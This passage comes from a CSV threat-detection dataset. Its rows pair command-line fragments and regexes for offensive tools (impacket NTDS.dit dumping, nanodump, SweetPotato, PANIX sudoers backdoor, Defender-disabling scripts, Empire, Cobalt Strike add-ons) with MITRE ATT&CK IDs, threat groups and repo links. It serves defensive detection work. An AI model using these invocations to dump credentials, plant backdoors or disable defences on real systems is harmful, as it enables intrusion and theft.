menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","3416"
"* string DCSync(*",".{0,1000}\sstring\sDCSync\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","3417"
"* --string 'venomcoming' *",".{0,1000}\s\-\-string\s\'venomcoming\'\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","3418"
"* --string 'venomleaving' *",".{0,1000}\s\-\-string\s\'venomleaving\'\s.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","3419"
"* stun-info.nse*",".{0,1000}\sstun\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3420"
"* stun-version.nse*",".{0,1000}\sstun\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3421"
"* stuxnet-detect.nse*",".{0,1000}\sstuxnet\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3422"
"* subbrute.py*",".{0,1000}\ssubbrute\.py.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","3423"
"* subbrute.run(*",".{0,1000}\ssubbrute\.run\(.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","3424"
"* submit_to_nemesis.py*",".{0,1000}\ssubmit_to_nemesis\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3425"
"* submit_to_nemesis.sh*",".{0,1000}\ssubmit_to_nemesis\.sh.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","3426"
"* Successful authentication. Access and refresh tokens have been written to the global $apptokens variable. To use them with other GraphRunner modules use the Tokens flag *",".{0,1000}\sSuccessful\sauthentication\.\sAccess\sand\srefresh\stokens\shave\sbeen\swritten\sto\sthe\sglobal\s\$apptokens\svariable\.\sTo\suse\sthem\swith\sother\sGraphRunner\smodules\suse\sthe\sTokens\sflag\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","3427"
"* Successfully hijacked KeePassXC.exe*",".{0,1000}\sSuccessfully\shijacked\sKeePassXC\.exe.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","3428"
"* --sudoers-backdoor*",".{0,1000}\s\-\-sudoers\-backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","3429"
"* supermicro-ipmi-conf.nse*",".{0,1000}\ssupermicro\-ipmi\-conf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3430"
"* Supershell.tar.gz*",".{0,1000}\sSupershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","3431"
"* -sV --script vulners *",".{0,1000}\s\-sV\s\-\-script\svulners\s.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Discovery","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3433"
"* svn-brute.nse*",".{0,1000}\ssvn\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3434"
"* SW2_HashSyscall*",".{0,1000}\sSW2_HashSyscall.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3435"
"* SweetPotato by @_EthicalChaos*",".{0,1000}\sSweetPotato\sby\s\@_EthicalChaos.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","0","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","3436"
"* Sweetpotato.exe*",".{0,1000}\sSweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","3437"
"* --syscalls GetSyscallStub*",".{0,1000}\s\-\-syscalls\sGetSyscallStub.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3438"
"* -syscalls -sleep=*.exe*",".{0,1000}\s\-syscalls\s\-sleep\=.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","3439"
"* --syscalls SysWhispers3*",".{0,1000}\s\-\-syscalls\sSysWhispers3.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3440"
"* -system * -ntds *ntds.dit*",".{0,1000}\s\-system\s.{0,1000}\s\-ntds\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","3441"
"* System account. On victim computer should be installed AD CS*",".{0,1000}\sSystem\saccount\.\sOn\svictim\scomputer\sshould\sbe\sinstalled\sAD\sCS.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","3442"
"* -system SYSTEM -ntds NTDS.dit LOCAL*",".{0,1000}\s\-system\sSYSTEM\s\-ntds\sNTDS\.dit\sLOCAL.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3443"
"* -system SYSTEM -ntds NTDS.dit -outputfile*",".{0,1000}\s\-system\sSYSTEM\s\-ntds\sNTDS\.dit\s\-outputfile.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","3444"
"* --syswhispers --jump*",".{0,1000}\s\-\-syswhispers\s\-\-jump.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","3445"
"* SysWhispers*",".{0,1000}\sSysWhispers.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","3446"
"* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*",".{0,1000}\s\-t\s.{0,1000}https\:\/\/autodiscover\..{0,1000}\/autodiscover\/autodiscover\.xml.{0,1000}autodiscover.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","3447"
"* -t 127.0.0.1 -p 1337 *",".{0,1000}\s\-t\s127\.0\.0\.1\s\-p\s1337\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","3448"
"* -t 20 -ipl iplist.txt -p32 *",".{0,1000}\s\-t\s20\s\-ipl\siplist\.txt\s\-p32\s.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","3449"
"* -t BindShell -p *pwned\pipe\spoolss*",".{0,1000}\s\-t\sBindShell\s\-p\s.{0,1000}pwned\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","3450"
"* -t C2concealer *",".{0,1000}\s\-t\sC2concealer\s.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","3451"
"* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e *.exe*",".{0,1000}\s\-t\sCreateProcessAsUserW\s\-p\s.{0,1000}pwned\\pipe\\spoolss.{0,1000}\s\-e\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","3452"
"* -t dcsync://* -*",".{0,1000}\s\-t\sdcsync\:\/\/.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","3453"
"* -t donut *",".{0,1000}\s\-t\sdonut\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3454"
"* -t pe2sh*",".{0,1000}\s\-t\spe2sh.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","3455"
"* -t schtaskbackdoor *",".{0,1000}\s\-t\sschtaskbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","3456"
"* T:U- odusN*",".{0,1000}\sT\:U\-\sodusN.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","3457"
"* t2w.py*",".{0,1000}\st2w\.py.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","3458"
"* -Target * -AllDomain *",".{0,1000}\s\-Target\s.{0,1000}\s\-AllDomain\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3462"
"* -Target * -InitialGrooms *",".{0,1000}\s\-Target\s.{0,1000}\s\-InitialGrooms\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","3463"
"* -Target * -Shellcode *",".{0,1000}\s\-Target\s.{0,1000}\s\-Shellcode\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - 